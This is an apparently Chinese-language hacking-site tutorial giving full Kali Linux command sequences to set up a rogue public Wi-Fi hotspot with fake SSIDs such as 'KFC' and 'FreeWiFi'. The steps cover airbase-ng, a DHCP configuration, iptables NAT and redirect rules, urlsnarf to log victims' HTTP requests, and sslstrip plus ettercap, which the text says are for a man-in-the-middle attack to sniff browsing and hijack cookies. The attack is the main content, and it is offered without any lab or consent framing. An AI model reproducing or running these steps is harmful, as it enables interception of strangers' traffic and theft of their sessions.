Kali-linux下创建wifi热点(wifi绵羊墙搭建)

华盟原创文章投稿奖励计划

方案1:

iwconfig命令查看是否成功识别

airmon-ng命令查看无线网卡情况,找到接入的USB无线网卡名称,

airmon-ng start wlan2命令使USB无线网卡工作在监听模式;

 

airbase-ng –e “KFC” –c 11 wlan0mon命令并回车,这样就生成了一个工作在11频道、SSID名称为“KFC”的热点;

 

ifconfig –a命令,查看接口网卡at0是否存在,确认存在后,

 

ifconfig at0 up命令启动接口网卡at0;

 

配置DHCP服务的各项参数,

vim /etc/dhcp/dhcpd.conf命令并回车,开始编辑isc-dhcpd软件的配置文件,其中:

ddns-update-style none表示不自动更新DNS与DHCP服务器的动态信息

subnet 192.168.100.0 netmask 255.255.255.0表示IP地址段为192.168.100.0/24,子网掩码为255.255.255.0

range 192.168.100.50 192.168.100.100表示用于分配的IP地址为.50-.200

option subnet-mask 设置子网掩码,option broadcast-address设置广播地址

option routers 192.168.100.1表示设置网关为192.168.100.1

option domain-name-servers 10.0.1.106表示设置DNS解析服务器为10.0.1.106

 

配置详细:

subnet 192.168.100.0 netmask 255.255.255.0 {

range 192.168.100.50 192.168.100.200;

option subnet-mask255.255.255.0;  #子网掩码

option broadcast-address192.168.100.255; #广播地址

option routers192.168.100.1; #网关

option domain-name-sercers10.0.1.106; #DNS解析服务器,.106这个ip是bt5的(另外一台虚拟机)

default-lease-time 21600;

max-lease-time 43200;

}

 

编辑好后,按“Esc”键,敲入“:wq”保存退出.

ifconfig at0 192.168.100.1 netmask 255.255.255.0命令并回车,设置接口网卡at0的ip地址和子网掩码;

route add –net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1命令并回车,表示增加一条路由记录,使192.168.100.1网关生效;

dhcpd –d –f –cf /etc/dhcp/dhcpd.conf at0命令并回车,启动DHCP服务;

 

打开新的终端

echo 1 > /proc/sys/net/ipv4/ip_forward命令并回车,开启系统数据转发功能;

iptables –t nat –A POSTROUTING --out-interface eth0 –j MASQUERADE命令并回车,设置iptables转发,将所有数据转发到eth0网卡;

urlsnarf –i at0启动urlsnarf软件,嗅探输出at0网卡上所有HTTP访问记录;

 

 

方案2:
使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!

所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:
Aircrack-ng 套件    #用来发送数据
isc-dhcp-server    #简单的dhcp服务器
sslstrip       #突破ssl加密
ettercap      #嗅探劫持

vim /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:

authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "FreeWiFi";
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100; }

然后激活网卡至监听模式:
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此时虚拟wifi的信号已经发送出去了,如果出现错误:
Error: Got channel -1, expected a value > 0.
执行如下命令:

airmon-ng stop mon0

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

然后从激活网卡至监听模式那里重新开始。
接着执行如下命令:

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:

华盟知识星球入口

sslstrip -fpk 10000
ettercap -Tpuqi at0

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/25271.html

发表评论